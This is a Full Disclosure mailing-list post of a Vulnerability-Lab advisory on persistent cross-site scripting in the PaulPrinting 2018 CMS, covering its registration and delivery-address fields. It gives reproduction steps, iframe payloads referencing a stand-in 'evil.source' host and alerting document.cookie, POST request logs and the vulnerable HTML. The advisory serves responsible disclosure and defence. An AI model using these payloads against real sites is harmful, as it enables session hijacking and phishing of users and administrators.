[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
From: "info@xxxxxxxxxxxxxxxxxxxxx" <info@xxxxxxxxxxxxxxxxxxxxx>
Date: Wed, 19 Jul 2023 09:47:38 +0200

Document Title:
===============
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285


Release Date:
=============
2023-07-19


Vulnerability Laboratory ID (VL-ID):
====================================
2285


Common Vulnerability Scoring System:
====================================
5.8


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, 
modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent 
cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.


Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities has been discovered in the 
official PaulPrinting (v2018) cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser
to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are 
able to register user account with malicious script code.
After the registration to attacker provokes an execution of the malformed 
scripts on review of the settings or by user reviews of admins
in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers 
with low privileged user accounts are able to inject own
malicious script code to contact details. Thus allows to perform an execute on 
each interaction with users or by reviews of admins in
the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that 
executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test 
payload
Note: T he script code executes on each review of the address in the backend or 
user frontend
10. Successful reproduce of the second vulnerability!


Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>


--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; 
session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; 
session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source 
onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source 
onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source 
onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source 
onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source 
onload(alert(document.cookie)>">
</div></div>


Vulnerable Source: Deliery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a 
href="https://paulprinting.localhost:8000/printing/account/delivery?id=10";>Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1";  
onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>


Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with 
persistent attack vector are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] 
-https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or 
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com               www.vuln-lab.com                
                www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

                                    Copyright © 2023 | Vulnerability Laboratory - 
[Evolution Security GmbH]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Attachment: OpenPGP_0x1554D09B2933E2FE.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability
Next by Date: [FD] [SYSS-2023-005]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38335)
Previous by thread: [FD] Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability
Next by thread: [FD] [SYSS-2023-005]: Omnis Studio - Expected Behavior Violation (CWE-440) (CVE-2023-38335)
Index(es):
- Date
- Thread